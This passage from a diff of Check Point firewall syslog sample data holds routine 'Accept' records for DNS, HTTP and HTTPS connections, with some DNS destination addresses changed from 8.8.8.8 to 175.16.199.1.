service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x4,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.142"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56712"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x5,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.142"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56714"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x6,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.142"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56716"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x7,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.142"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56718"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46625"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46625"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.67"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59706"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37560"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x8,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37560"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x8,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.19.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33986"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.19.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55652"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41740"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"21"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501093"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41740"; 
service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a5,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"22"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.168.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38354"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46529"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46529"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"34.215.75.150"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37662"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"34.215.75.150"; log_delay:"1585501094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37664"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] <134>1 2020-03-29T16:58:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a6,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"34.215.75.150"; log_delay:"1585501094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37666"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a7,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"93.184.220.29"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46676"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53632"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37701"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53632"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37701"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58862"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ae,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33463"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d3ae,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60298"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43492"; xlatesrc:"0.0.0.0"] 
@@ -1795,21 +1795,21 @@ <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585501102"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58864"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:58:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3ae,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 